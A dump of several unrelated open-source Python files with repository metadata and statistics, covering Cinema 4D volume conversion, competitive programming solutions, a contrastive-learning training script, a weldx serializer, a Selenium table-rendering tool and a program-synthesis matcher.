] | null | null | null | scripts/05_modules/volume/volumetools_meshtovolume_volumetomesh_r20.py | mgoldshteyn/cinema4d_py_sdk_extended | b6c67f1dbae182c09ccbcc1df51f0e7ea4816074 | [
"Apache-2.0"
] | null | null | null | scripts/05_modules/volume/volumetools_meshtovolume_volumetomesh_r20.py | mgoldshteyn/cinema4d_py_sdk_extended | b6c67f1dbae182c09ccbcc1df51f0e7ea4816074 | [
"Apache-2.0"
] | null | null | null | """
Copyright: MAXON Computer GmbH
Author: Maxime Adam
Description:
- Convert a Polygon Object to a Volume and convert it back to a Polygon Object
Class/method highlighted:
- Ovolume.SetVolume()
- maxon.frameworks.volume.VolumeConversionPolygon
- maxon.frameworks.volume.VolumeToolsInterface.MeshToVolume()
- maxon.frameworks.volume.VolumeToolsInterface.VolumeToMesh()
Compatible:
- Win / Mac
- R20, R21, S22
"""
import c4d
import maxon
from maxon.frameworks import volume
def main():
# Checks if there is an active object
if op is None:
raise ValueError("op is None, please select one object.")
# Checks if the input obj is a PolygonObject
if not op.IsInstanceOf(c4d.Opolygon):
raise TypeError("obj is not a c4d.Opolygon.")
# Retrieves the world matrices of the object
matrix = op.GetMg()
# Creates a BaseArray (list) of all points position in world space
vertices = maxon.BaseArray(maxon.Vector)
vertices.Resize(op.GetPointCount())
for i, pt in enumerate(op.GetAllPoints()):
vertices[i] = pt * matrix
# Sets polygons
polygons = maxon.BaseArray(maxon.frameworks.volume.VolumeConversionPolygon)
polygons.Resize(op.GetPolygonCount())
for i, poly in enumerate(op.GetAllPolygons()):
newPoly = maxon.frameworks.volume.VolumeConversionPolygon()
newPoly.a = poly.a
newPoly.b = poly.b
newPoly.c = poly.c
if poly.IsTriangle():
newPoly.SetTriangle()
else:
newPoly.d = poly.d
polygons[i] = newPoly
polygonObjectMatrix = maxon.Matrix()
gridSize = 10
bandWidthInterior = 1
bandWidthExterior = 1
# Converts the polygon into a volume
# Before R21
if c4d.GetC4DVersion() < 21000:
volumeRef = maxon.frameworks.volume.VolumeToolsInterface.MeshToVolume(vertices,
polygons, polygonObjectMatrix,
gridSize,
bandWidthInterior, bandWidthExterior,
maxon.ThreadRef(), None)
else:
volumeRef = maxon.frameworks.volume.VolumeToolsInterface.MeshToVolume(vertices,
polygons, polygonObjectMatrix,
gridSize,
bandWidthInterior, bandWidthExterior,
maxon.ThreadRef(),
maxon.POLYGONCONVERSIONFLAGS.NONE, None)
# Creates a Volume Object to store the previous volume calculated
volumeObj = c4d.BaseObject(c4d.Ovolume)
if volumeObj is None:
raise MemoryError("Failed to create a volume object.")
doc.InsertObject(volumeObj)
volumeObj.SetVolume(volumeRef)
# Converts back to Polygon
polyObject = maxon.frameworks.volume.VolumeToolsInterface.VolumeToMesh(volumeRef, 0.0, 1)
doc.InsertObject(polyObject)
# Pushes an update event to Cinema 4D
c4d.EventAdd()
if __name__ == '__main__':
main()
| 36.389474 | 118 | 0.562916 | 310 | 3,457 | 6.251613 | 0.409677 | 0.069659 | 0.086687 | 0.105779 | 0.239938 | 0.157895 | 0.157895 | 0.157895 | 0.157895 | 0.157895 | 0 | 0.013272 | 0.367949 | 3,457 | 94 | 119 | 36.776596 | 0.873684 | 0.233729 | 0 | 0.192308 | 0 | 0 | 0.039514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.057692 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e895b8d6da905ee2ccb3d3f6cf10e14062564091 | 294 | py | Python | submissions/abc071/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | 1 | 2021-05-10T01:16:28.000Z | 2021-05-10T01:16:28.000Z | submissions/abc071/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | 3 | 2021-05-11T06:14:15.000Z | 2021-06-19T08:18:36.000Z | submissions/abc071/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | null | null | null | import sys
s = list(input())
set_s = set(s)
new_s = list(set_s)
new_s.sort()
for i in range(26):
if ord(new_s[i]) != 97+i:
print(chr(97+i))
sys.exit()
if len(new_s) == i+1:
if i == 25:
break
print(chr(98+i))
sys.exit()
print('None')
| 17.294118 | 29 | 0.493197 | 53 | 294 | 2.622642 | 0.471698 | 0.115108 | 0.100719 | 0.115108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055276 | 0.323129 | 294 | 16 | 30 | 18.375 | 0.643216 | 0 | 0 | 0.133333 | 0 | 0 | 0.013605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8976d3c3733f057c3b67ec7ca4bab4b95799582 | 17,104 | py | Python | main_joint_domain_blanced.py | bomtorazek/SupContrast | 943d1157d38136f9df55418e0b44fbc60744b142 | [
"BSD-2-Clause"
] | null | null | null | main_joint_domain_blanced.py | bomtorazek/SupContrast | 943d1157d38136f9df55418e0b44fbc60744b142 | [
"BSD-2-Clause"
] | null | null | null | main_joint_domain_blanced.py | bomtorazek/SupContrast | 943d1157d38136f9df55418e0b44fbc60744b142 | [
"BSD-2-Clause"
] | 1 | 2021-06-18T14:50:23.000Z | 2021-06-18T14:50:23.000Z | from __future__ import print_function
import os
import sys
import time
import tensorboard_logger as tb_logger
import torch
import torch.backends.cudnn as cudnn
from torch.utils import data
from torch.utils.data import dataset
from torchvision import transforms, datasets
from torch.nn.functional import normalize
from sklearn.metrics import roc_auc_score
import numpy as np
from util import TwoCropTransform, AverageMeter
from util import adjust_learning_rate, warmup_learning_rate,accuracy, best_accuracy
from util import set_optimizer, save_model
from networks.resnet_big import SupHybResNet
from losses import SupConLoss, CrossSupConLoss
from config import parse_option
from datasets.general_dataset import GeneralDataset
# from torchsampler import ImbalancedDatasetSampler
from util import load_image_names
try:
import apex
from apex import amp, optimizers
except ImportError:
pass
def set_loader(opt):
# construct data loader
if opt.dataset == 'cifar10':
mean = (0.4914, 0.4822, 0.4465)
std = (0.2023, 0.1994, 0.2010)
scale = (0.2, 1.)
elif opt.dataset == 'cifar100':
mean = (0.5071, 0.4867, 0.4408)
std = (0.2675, 0.2565, 0.2761)
scale = (0.2, 1.)
elif opt.dataset == 'path':
mean = eval(opt.mean)
std = eval(opt.std)
scale = (0.2, 1.)
else:
mean = (0.485, 0.456, 0.406)
std = (0.229, 0.224, 0.225)
scale = (0.875, 1.)
normalize = transforms.Normalize(mean=mean, std=std)
train_transform = transforms.Compose([
transforms.RandomResizedCrop(size=opt.size, scale= scale),
transforms.RandomHorizontalFlip(),
transforms.RandomApply([
transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)
], p=0.8),
transforms.RandomGrayscale(p=0.2),
transforms.ToTensor(),
normalize,
])
test_transform = val_transform = transforms.Compose([
transforms.Resize(opt.size),
transforms.ToTensor(),
normalize,
])
if opt.method == 'Joint_Con':
train_transform =TwoCropTransform(train_transform)
elif opt.method == 'Joint_CE':
pass
else:
raise ValueError("check method")
# dataset
custom = False
if opt.dataset == 'cifar10':
train_dataset = datasets.CIFAR10(root=opt.data_folder,
transform=train_transform,
download=True)
elif opt.dataset == 'cifar100':
train_dataset = datasets.CIFAR100(root=opt.data_folder,
transform=train_transform,
download=True)
elif opt.dataset == 'path':
train_dataset = datasets.ImageFolder(root=opt.data_folder,
transform=train_transform)
else:
train_names_S, _, _ = load_image_names(opt.source_data_folder, 1.0, opt)
train_names_T, val_names_T, test_names_T = load_image_names(opt.data_folder, opt.train_util_rate,opt)
train_dataset_S = GeneralDataset(data_dir=opt.source_data_folder, image_names=train_names_S,
transform=train_transform)
train_dataset_T = GeneralDataset(data_dir=opt.data_folder, image_names=train_names_T,
transform=train_transform)
val_dataset_T = GeneralDataset(data_dir=opt.data_folder, image_names=val_names_T,
transform=val_transform,)
test_dataset_T = GeneralDataset(data_dir=opt.data_folder, image_names=test_names_T,
transform=test_transform)
custom = True
# dataloader
if custom:
train_loader_S = torch.utils.data.DataLoader(
train_dataset_S, batch_size=opt.batch_size, shuffle= True,
num_workers=opt.num_workers, pin_memory=True, sampler=None, drop_last = True)
train_loader_T = torch.utils.data.DataLoader(
train_dataset_T, batch_size=opt.batch_size, shuffle= True,
num_workers=opt.num_workers, pin_memory=True, sampler=None, drop_last = True)
val_loader_T = torch.utils.data.DataLoader(
val_dataset_T, batch_size=opt.batch_size, shuffle= False,
num_workers=opt.num_workers, pin_memory=True, sampler=None)
test_loader_T = torch.utils.data.DataLoader(
test_dataset_T, batch_size=opt.batch_size, shuffle= False,
num_workers=opt.num_workers, pin_memory=True, sampler=None)
return {'train_S': train_loader_S, 'train_T': train_loader_T, 'val': val_loader_T, 'test': test_loader_T}
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=opt.batch_size, shuffle=(train_sampler is None),
num_workers=opt.num_workers, pin_memory=True, sampler=train_sampler)
return train_loader
def set_model(opt):
model = SupHybResNet(name=opt.model, num_classes=opt.num_cls)
if opt.method == 'Joint_Con':
criterion = {}
criterion['Cross'] = CrossSupConLoss(temperature=opt.temp)
criterion['Con'] = SupConLoss(temperature=opt.temp)
criterion['CE'] = torch.nn.CrossEntropyLoss()
elif opt.method == 'Joint_CE':
criterion = torch.nn.CrossEntropyLoss()
else:
raise ValueError("check method")
if opt.model_transfer is not None:
pretrained_dict = torch.load(opt.model_transfer)['model']
model_dict = model.state_dict()
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
# enable synchronized Batch Normalization
if opt.syncBN:
model = apex.parallel.convert_syncbn_model(model)
if torch.cuda.is_available():
if torch.cuda.device_count() > 1:
model.encoder = torch.nn.DataParallel(model.encoder)
model = model.cuda()
if opt.method == 'Joint_Con':
criterion['CE']=criterion['CE'].cuda()
criterion['Cross']=criterion['Cross'].cuda()
criterion['Con']=criterion['Con'].cuda()
elif opt.method == 'Joint_CE':
criterion = criterion.cuda()
else:
raise ValueError("check method")
cudnn.benchmark = True
return model, criterion
def train(train_S, train_T, model, criterion, optimizer, epoch, opt):
"""one epoch training"""
model.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses_CE = AverageMeter()
top1 = AverageMeter()
if opt.method == 'Joint_Con':
losses_Con_TT = AverageMeter()
losses_Con_SS = AverageMeter()
losses_Con_TS = AverageMeter()
losses_Con_ST = AverageMeter()
end = time.time()
source_iter = iter(train_S)
target_iter = iter(train_T)
for idx in range(len(train_T)):
try: # 중간에 loader 끝나는 것 방지
images_S, labels_S = source_iter.next()
except:
source_iter = iter(train_S)
images_S, labels_S = source_iter.next()
try:
images_T, labels_T = target_iter.next()
except:
target_iter = iter(train_T)
images_T, labels_T = target_iter.next()
data_time.update(time.time() - end)
bsz = labels_T.shape[0]
if opt.method == 'Joint_CE':
bsz_T = images_T.shape[0]
images_S =images_S[:bsz_T]
images = torch.cat([images_T, images_S], dim=0)
labels = torch.cat([labels_T, labels_S], dim=0)
images = images.cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
# warm-up learning rate
warmup_learning_rate(opt, epoch, idx, len(train_T), optimizer)
# compute loss
_, output = model(images)
loss_CE = criterion(output, labels)
elif opt.method == 'Joint_Con':
img_T = torch.cat([images_T[0], images_T[1]], dim=0)
bsz_T = images_T[0].shape[0]
img_S = torch.cat([images_S[0][:bsz_T], images_S[1][:bsz_T]], dim=0)
labels = torch.cat([labels_T, labels_T,labels_S[:bsz_T],labels_S[:bsz_T]], dim=0)
images = torch.cat([img_T, img_S], dim=0)
# TTSS
images = images.cuda(non_blocking=True)
labels_T = labels_T.cuda(non_blocking=True)
labels_S = labels_S[:bsz_T].cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
# warm-up learning rate
warmup_learning_rate(opt, epoch, idx, len(train_T), optimizer)
# compute loss
features, output = model(images)
if opt.head == 'mlp':
f1_T, f2_T, f1_S, f2_S = torch.split(features, [bsz_T, bsz_T, bsz_T, bsz_T], dim=0)
elif opt.head == 'fc':
f1_T, f2_T, f1_S, f2_S = torch.split(normalize(output,dim=1), [bsz_T, bsz_T, bsz_T, bsz_T], dim=0)
features_T = torch.cat([f1_T.unsqueeze(1), f2_T.unsqueeze(1)], dim=1)
features_S = torch.cat([f1_S.unsqueeze(1), f2_S.unsqueeze(1)], dim=1)
#make new dimension and concat by that dimension.
loss_Con_TT = criterion['Con'](features_T, labels_T)
loss_Con_SS = criterion['Con'](features_S, labels_S)
loss_Con_TS = criterion['Cross'](features_T,features_S, labels_T, labels_S)
loss_Con_ST = criterion['Cross'](features_S,features_T, labels_S, labels_T)
loss_CE = criterion['CE'](output, labels)
loss_Con = loss_Con_TT + loss_Con_SS + loss_Con_TS + loss_Con_ST
# update metric
losses_CE.update(loss_CE.item(), bsz)
if opt.method == 'Joint_Con':
losses_Con_TT.update(loss_Con_TT.item(), bsz)
losses_Con_SS.update(loss_Con_SS.item(), bsz)
losses_Con_TS.update(loss_Con_TS.item(), bsz)
losses_Con_ST.update(loss_Con_ST.item(), bsz)
acc1, _ = accuracy(output[:2*bsz,:], labels[:2*bsz], topk=(1, 2))
else:
acc1, _ = accuracy(output[:bsz,:], labels[:bsz], topk=(1, 2))
top1.update(acc1[0], bsz)
# SGD
optimizer.zero_grad()
if opt.method == 'Joint_Con':
total_loss = loss_Con + loss_CE
total_loss.backward()
optimizer.step()
else:
loss_CE.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print info
# if idx == len(train_T)-1:
if idx % 1 == 0:
print('Train: [{0}][{1}/{2}]\t'
'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
'loss {loss.val:.3f} ({loss.avg:.3f})'.format(
epoch, idx + 1, len(train_T), batch_time=batch_time,
data_time=data_time, loss=losses_CE))
sys.stdout.flush()
if opt.method == 'Joint_Con':
return {'CE':losses_CE.avg, 'TT': losses_Con_TT.avg, 'SS':losses_Con_SS.avg, 'TS': losses_Con_TS.avg, 'ST': losses_Con_ST.avg}, top1.avg
else:
return losses_CE.avg, top1.avg
def validate(val_loader, model, criterion, opt):
"""validation"""
model.eval()
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
probs = []
gts = []
with torch.no_grad():
end = time.time()
for idx, (images, labels) in enumerate(val_loader):
images = images.float().cuda()
gts.extend(labels.tolist())
labels = labels.cuda()
bsz = labels.shape[0]
# forward
_, output = model(images)
prob = torch.nn.functional.softmax(output, dim=1)[:,1]
probs.extend(prob.tolist())
if opt.method == 'Joint_Con':
loss = criterion['CE'](output, labels)
else:
loss = criterion(output, labels)
# update metric
losses.update(loss.item(), bsz)
acc1, acc2 = accuracy(output, labels, topk=(1, 2))
top1.update(acc1[0], bsz)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if idx == len(val_loader)-1:
print('Val: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
idx, len(val_loader), batch_time=batch_time,
loss=losses, top1=top1))
gts = np.array(gts)
probs = np.array(probs)
print(probs)
auc = roc_auc_score(gts, probs)
best_acc, best_th = best_accuracy(gts,probs)
print('Val auc: {:.3f}'.format(auc), end = ' ')
print('Val acc: {:.3f}'.format(best_acc) )
return losses.avg, auc, best_acc, best_th
def test(test_loader, model, opt, best_th = None):
model.eval()
probs = []
gts = []
if best_th is None:
pretrained_dict = torch.load(os.path.join(
opt.save_folder, 'auc_best.pth'))['model']
model.load_state_dict(pretrained_dict)
else:
pretrained_dict = torch.load(os.path.join(
opt.save_folder, 'acc_best.pth'))['model']
model.load_state_dict(pretrained_dict)
with torch.no_grad():
for idx, (images, labels) in enumerate(test_loader):
images = images.float().cuda()
gts.extend(labels.tolist())
labels = labels.cuda()
# forward
_, output = model(images)
prob = torch.nn.functional.softmax(output, dim=1)[:,1]
probs.extend(prob.tolist())
gts = np.array(gts)
probs = np.array(probs)
if best_th is None:
auc = roc_auc_score(gts, probs)
return auc
else:
from sklearn.metrics import accuracy_score
acc = accuracy_score(gts, probs>=best_th)
return acc
def main():
best_auc = 0.0
best_acc = 0.0
opt = parse_option()
os.environ["CUDA_VISIBLE_DEVICES"] = opt.gpu
# build data loader
loaders = set_loader(opt) # tuple or dict
# build model and criterion
model, criterion = set_model(opt)
# build optimizer
optimizer = set_optimizer(opt, model)
# tensorboard
logger = tb_logger.Logger(logdir=opt.tb_folder, flush_secs=2)
# training routine
for epoch in range(1, opt.epochs + 1):
adjust_learning_rate(opt, optimizer, epoch)
# train for one epoch
time1 = time.time()
loss, train_acc = train(loaders['train_S'], loaders['train_T'], model, criterion, optimizer, epoch, opt)
time2 = time.time()
print('epoch {}, total time {:.2f}'.format(epoch, time2 - time1))
# tensorboard logger
if opt.method == 'Joint_Con':
logger.log_value('train_loss_CE', loss['CE'], epoch)
logger.log_value('train_Con_TT', loss['TT'], epoch)
logger.log_value('train_Con_SS', loss['SS'], epoch)
logger.log_value('train_Con_TS', loss['TS'], epoch)
logger.log_value('train_Con_ST', loss['ST'], epoch)
else:
logger.log_value('train_loss', loss, epoch)
logger.log_value('train_acc', train_acc, epoch)
logger.log_value('learning_rate', optimizer.param_groups[0]['lr'], epoch)
# evaluation
val_loss, val_auc, val_acc, val_th = validate(loaders['val'], model, criterion, opt)
logger.log_value('val_loss', val_loss, epoch)
logger.log_value('val_auc', val_auc, epoch)
logger.log_value('val_acc', val_acc, epoch)
logger.log_value('val_th', val_th, epoch)
if val_auc > best_auc:
best_auc = val_auc
save_file = os.path.join(
opt.save_folder, 'auc_best.pth')
save_model(model, optimizer, opt, epoch, save_file)
if val_acc > best_acc:
best_acc = val_acc
best_th = val_th
save_file = os.path.join(
opt.save_folder, 'acc_best.pth')
save_model(model, optimizer, opt, epoch, save_file)
best_auc = test(loaders['test'], model, opt)
best_acc = test(loaders['test'], model, opt, best_th)
print('Test auc: {:.2f}'.format(best_auc), end = ' ')
print('Test acc: {:.2f}'.format(best_acc) ,end = ' ')
print('Test th: {:.2f}'.format(best_th) ,end = ' ')
import csv
with open("result.csv", "a") as file:
writer = csv.writer(file)
row = [opt.model_name, 'auc', best_auc, 'acc', best_acc, 'th', best_th]
writer.writerow(row)
if __name__ == '__main__':
main()
| 36.469083 | 144 | 0.59413 | 2,187 | 17,104 | 4.417924 | 0.138089 | 0.006624 | 0.020286 | 0.01656 | 0.378493 | 0.317429 | 0.25088 | 0.214552 | 0.188263 | 0.162699 | 0 | 0.019247 | 0.286132 | 17,104 | 468 | 145 | 36.547009 | 0.772072 | 0.034144 | 0 | 0.351955 | 0 | 0 | 0.057767 | 0.004308 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01676 | false | 0.005587 | 0.072626 | 0 | 0.111732 | 0.027933 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e899eb14b3bf3e25a924a0daacbca47f186a5969 | 1,532 | py | Python | weldx/tags/core/mathematical_expression.py | CagtayFabry/weldx | 463f949d4fa54b5edafa2268cb862716865a62c2 | [
"BSD-3-Clause"
] | null | null | null | weldx/tags/core/mathematical_expression.py | CagtayFabry/weldx | 463f949d4fa54b5edafa2268cb862716865a62c2 | [
"BSD-3-Clause"
] | 3 | 2022-03-06T00:22:32.000Z | 2022-03-27T00:23:51.000Z | weldx/tags/core/mathematical_expression.py | CagtayFabry/weldx | 463f949d4fa54b5edafa2268cb862716865a62c2 | [
"BSD-3-Clause"
] | null | null | null | import warnings
import sympy
from xarray import DataArray
from weldx.asdf.types import WeldxConverter
from weldx.constants import META_ATTR
from weldx.core import MathematicalExpression
__all__ = ["MathematicalExpression", "MathematicalExpressionConverter"]
class MathematicalExpressionConverter(WeldxConverter):
"""Serialization class for sympy style math expressions."""
name = "core/mathematical_expression"
version = "0.1.0"
types = [MathematicalExpression]
def to_yaml_tree(self, obj: MathematicalExpression, tag: str, ctx) -> dict:
"""Convert to python dict."""
parameters = {}
for k, v in obj.parameters.items():
if isinstance(v, DataArray):
if len(v.coords) > 0:
warnings.warn("Coordinates are dropped during serialization.")
dims = v.dims
v = v.data
setattr(v, META_ATTR, dict(dims=dims))
parameters[k] = v
return {"expression": obj.expression.__str__(), "parameters": parameters}
def from_yaml_tree(self, node: dict, tag: str, ctx):
"""Construct from tree."""
parameters = {}
for k, v in node["parameters"].items():
if hasattr(v, META_ATTR):
dims = getattr(v, META_ATTR)["dims"]
delattr(v, META_ATTR)
v = (v, dims)
parameters[k] = v
return MathematicalExpression(
sympy.sympify(node["expression"]), parameters=parameters
)
| 31.916667 | 82 | 0.613577 | 160 | 1,532 | 5.7625 | 0.40625 | 0.043384 | 0.039046 | 0.032538 | 0.084599 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00363 | 0.280679 | 1,532 | 47 | 83 | 32.595745 | 0.833031 | 0.063969 | 0 | 0.121212 | 0 | 0 | 0.123413 | 0.057123 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.181818 | 0 | 0.424242 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89a008f95c4f137fc8a5dd19f62512f61a7e159 | 3,491 | py | Python | src/tools.py | matthewtwarren/TableGeneration | 011af5d4745e5388eb9648baa334c57f2371ddec | [
"MIT"
] | null | null | null | src/tools.py | matthewtwarren/TableGeneration | 011af5d4745e5388eb9648baa334c57f2371ddec | [
"MIT"
] | null | null | null | src/tools.py | matthewtwarren/TableGeneration | 011af5d4745e5388eb9648baa334c57f2371ddec | [
"MIT"
] | null | null | null | import traceback
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import Firefox
from selenium.webdriver.firefox.options import Options
from PIL import Image
from io import BytesIO
import warnings
import json
import time
from bs4 import BeautifulSoup
def warn(*args, **kwargs):
pass
warnings.warn = warn
def html_to_img(driver,html_content,id_count):
'''Converts html to image.
Args:
driver: Selenium web driver
html_content: String containing html code for table
id_count: number of text entities in table
Returns:
im: cropped table image
bboxes: list of lists containing the text, text length and bbox positions for each table entity
'''
counter=1 #This counter is to keep track of the exceptions and stop execution after 10 exceptions have occurred
while(True):
try:
driver.get("data:text/html;charset=utf-8," + html_content)
driver.set_window_size(3000,3000)
window_size=driver.get_window_size()
max_height,max_width=window_size['height'],window_size['width']
element = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, '0')))
bboxes=[]
for id in range(id_count):
#e = driver.find_element_by_id(str(id))
e = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, str(id))))
txt=e.text.strip()
lentext=len(txt)
loc = e.location
size_ = e.size
xmin = loc['x']
ymin = loc['y']
xmax = int(size_['width'] + xmin)
ymax = int(size_['height'] + ymin)
bboxes.append([lentext,txt,xmin,ymin,xmax,ymax])
# cv2.rectangle(im,(xmin,ymin),(xmax,ymax),(0,0,255),2)
png = driver.get_screenshot_as_png()
im = Image.open(BytesIO(png))
im = crop_image(im,bboxes)
return im,bboxes
except Exception as e:
counter+=1
if(counter==10):
raise e
continue
def crop_image(image,bboxes):
'''Crops image using bbox coordinates.
Args:
image: PIL image object.
bboxes: list of lists containg text bbox coordinates.
Returns:
cropped_image: cropped image.
'''
x_max, y_max = [], []
for set in bboxes:
x_max.append(int(set[4]))
y_max.append(int(set[5]))
max_width = max(x_max)+30
max_height = max(y_max)+30
cropped_image = image.crop((0,0, max_width, max_height))
return(cropped_image)
def html_to_csv(html_content):
'''Converts HTML file to .csv.
Args:
html_content: string containing contents of .html files.
Returns:
output_rows: list of lists containing contents of each row.
'''
soup = BeautifulSoup(html_content)
table = soup.find("table")
output_rows = []
for table_row in table.findAll('tr'):
headers = table_row.findAll('th')
columns = table_row.findAll('td')
output_row = []
for header in headers:
output_row.append(header.text)
for column in columns:
output_row.append(column.text)
output_rows.append(output_row)
return(output_rows)
| 29.336134 | 130 | 0.616729 | 452 | 3,491 | 4.621681 | 0.336283 | 0.031594 | 0.050263 | 0.026807 | 0.052657 | 0.052657 | 0.052657 | 0.052657 | 0.052657 | 0.052657 | 0 | 0.013649 | 0.286451 | 3,491 | 118 | 131 | 29.584746 | 0.82497 | 0.240619 | 0 | 0 | 0 | 0 | 0.02545 | 0.011355 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.014706 | 0.176471 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89b02505f482c17f49309f8d5fb5765f2c6a655 | 569 | py | Python | sols_python/1276.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | sols_python/1276.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | sols_python/1276.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | while True:
try:
entrada = sorted(list(input().replace(' ', '')))
entrada = list(map(ord, entrada))
entrada.append(127)
intervalos = list()
comecoDoIntervalo = 0
for pos, char in enumerate(entrada):
if pos != len(entrada) - 1:
if entrada[pos + 1] <= char + 1:
continue
intervalos.append(f'{chr(entrada[comecoDoIntervalo])}:{chr(char)}')
comecoDoIntervalo = pos + 1
print(', '.join(intervalos))
except EOFError:
break
| 33.470588 | 83 | 0.514938 | 55 | 569 | 5.327273 | 0.563636 | 0.027304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021798 | 0.355009 | 569 | 16 | 84 | 35.5625 | 0.776567 | 0 | 0 | 0 | 0 | 0 | 0.084359 | 0.079086 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89bfc3c5038ff312878d7e81c0e25eaee88ea7c | 13,685 | py | Python | dreamcoder/fragmentUtilities.py | theosech/ec | 7fc34fb9df8d1b34bd4eb11551ca6fa0f574ce0e | [
"Unlicense"
] | 290 | 2018-02-09T01:29:07.000Z | 2022-03-20T14:49:53.000Z | dreamcoder/fragmentUtilities.py | evelinehong/dreamcoder | 9de0434359721c8a4ecc44ae76649e21f1479c3d | [
"MIT"
] | 34 | 2018-03-23T00:33:49.000Z | 2022-03-19T21:48:09.000Z | dreamcoder/fragmentUtilities.py | evelinehong/dreamcoder | 9de0434359721c8a4ecc44ae76649e21f1479c3d | [
"MIT"
] | 98 | 2018-03-07T19:26:55.000Z | 2022-03-28T14:36:38.000Z | from dreamcoder.type import *
from dreamcoder.program import *
from dreamcoder.frontier import *
from collections import Counter
class MatchFailure(Exception):
pass
class Matcher(object):
def __init__(self, context):
self.context = context
self.variableBindings = {}
@staticmethod
def match(context, fragment, expression, numberOfArguments):
if not mightMatch(fragment, expression):
raise MatchFailure()
m = Matcher(context)
tp = fragment.visit(m, expression, [], numberOfArguments)
return m.context, tp, m.variableBindings
def application(
self,
fragment,
expression,
environment,
numberOfArguments):
'''returns tp of fragment.'''
if not isinstance(expression, Application):
raise MatchFailure()
ft = fragment.f.visit(
self,
expression.f,
environment,
numberOfArguments + 1)
xt = fragment.x.visit(self, expression.x, environment, 0)
self.context, returnType = self.context.makeVariable()
try:
self.context = self.context.unify(ft, arrow(xt, returnType))
except UnificationFailure:
raise MatchFailure()
return returnType.apply(self.context)
def index(self, fragment, expression, environment, numberOfArguments):
# This is a bound variable
surroundingAbstractions = len(environment)
if fragment.bound(surroundingAbstractions):
if expression == fragment:
return environment[fragment.i].apply(self.context)
else:
raise MatchFailure()
# This is a free variable
i = fragment.i - surroundingAbstractions
# Make sure that it doesn't refer to anything bound by a
# lambda in the fragment. Otherwise it cannot be safely lifted
# out of the fragment and preserve semantics
for fv in expression.freeVariables():
if fv < len(environment):
raise MatchFailure()
# The value is going to be lifted out of the fragment
try:
